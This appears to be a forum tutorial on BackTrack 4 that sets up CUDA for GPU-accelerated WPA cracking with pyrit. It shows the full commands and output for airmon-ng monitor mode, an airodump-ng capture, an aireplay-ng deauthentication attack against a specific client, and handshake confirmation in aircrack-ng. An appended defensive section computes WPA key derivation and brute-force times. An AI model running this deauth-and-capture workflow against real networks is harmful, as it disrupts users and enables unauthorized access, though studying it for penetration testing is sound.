OK, so here we are with a fresh new release, and people, let's be honest, we want to see something new. Well, this is one of bt4's new exciting features.

WPA hash table generation using CUDA/NVIDIA GPU power.

First thing to do is check if your card is supported for this technology: http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

So let's get started...

I'm going to try to assume that if you're reading this you have no clue what you're doing, so I will try to go from A to Z on this.

So let's boot our disk, and when we get to the framebuffer console prompt (that's before you startx) we are going to install the nvidia kernel module.
Code:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL
You will get some output and then you will be asked whether to overwrite your current xorg.conf. Take the default here, which is no.
Next, let's install the driver.
Code:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a
OK, so that's done. Now, since we've totally borked our xorg.conf, we should generate a new one.
Code:
root@bt:~# X -configure
That will save the new one in /root, and we will have to copy it over by hand.
Code:
root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf
At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

OK, so if everything went well you are looking at your desktop.

Now, before we get to cracking, pyrit has a benchmark utility we can use to see if we are good to go.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s

Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s
As you can see, my 8800gt is roughly 5 times faster than my Q6600 quad core chip running at 3.6 GHz.

OK swell, so that works. Now what we need is a .cap file. I'm assuming everyone can do this but I will show it anyway.
Code:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng -w cudacapture mon0
OK, so let's do a little scan of my house.


As you can see, I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1, feeding her new Facebook addiction.
Let's deauth her a$$
Code:
root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
Now let's check for success.
Code:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
   7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)

Index number of target network ?
Looks like we got one.
I'm going to start a new post for part 2.
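
For anyone choosing a passphrase policy in light of the benchmark figures above, here is an added example (not part of the original post and not pyrit's code). It derives the WPA-PSK pairwise master key as the standard defines it, with the ESSID as the salt, and converts the post's PMKs/s rates into the time needed to cover a passphrase space. The function names and the three passphrase shapes are assumptions chosen for illustration.

```python
import hashlib

# Benchmark rates quoted in the post above, in PMKs per second.
CPU_RATE = 1294.58   # 'Standard CPU' (4 CPUs)
GPU_RATE = 5409.43   # 'Nvidia CUDA' (GeForce 8800 GT)

# Constructed passphrase shapes: name -> (alphabet size, length).
POLICIES = {
    "8 digits": (10, 8),
    "8 lowercase letters": (26, 8),
    "12 mixed-case alphanumerics": (62, 12),
}


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes.

    The ESSID is the salt, so a precomputed table only applies to networks
    that use exactly that ESSID.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def days_to_exhaust(alphabet_size: int, length: int, rate: float) -> float:
    """Days needed to compute one PMK for every passphrase of the given shape."""
    return alphabet_size ** length / rate / 86400


def exposure_report(rate: float) -> dict:
    """Map each constructed policy to its exhaustion time in days at `rate`."""
    return {name: days_to_exhaust(a, n, rate) for name, (a, n) in POLICIES.items()}


if __name__ == "__main__":
    # Same passphrase, the two ESSIDs from the scan above: different PMKs.
    for essid in ("ddwrt1", "ddwrt2"):
        print(essid, wpa_pmk("examplepass", essid).hex())
    for label, rate in (("CPU", CPU_RATE), ("GPU", GPU_RATE)):
        for name, days in exposure_report(rate).items():
            print(f"{label:3} {name:28} {days:,.1f} days")
```

At the quoted GPU rate an 8-digit passphrase space is covered in a few hours, while a long mixed-alphabet passphrase and a non-default ESSID put both brute force and precomputed tables out of reach.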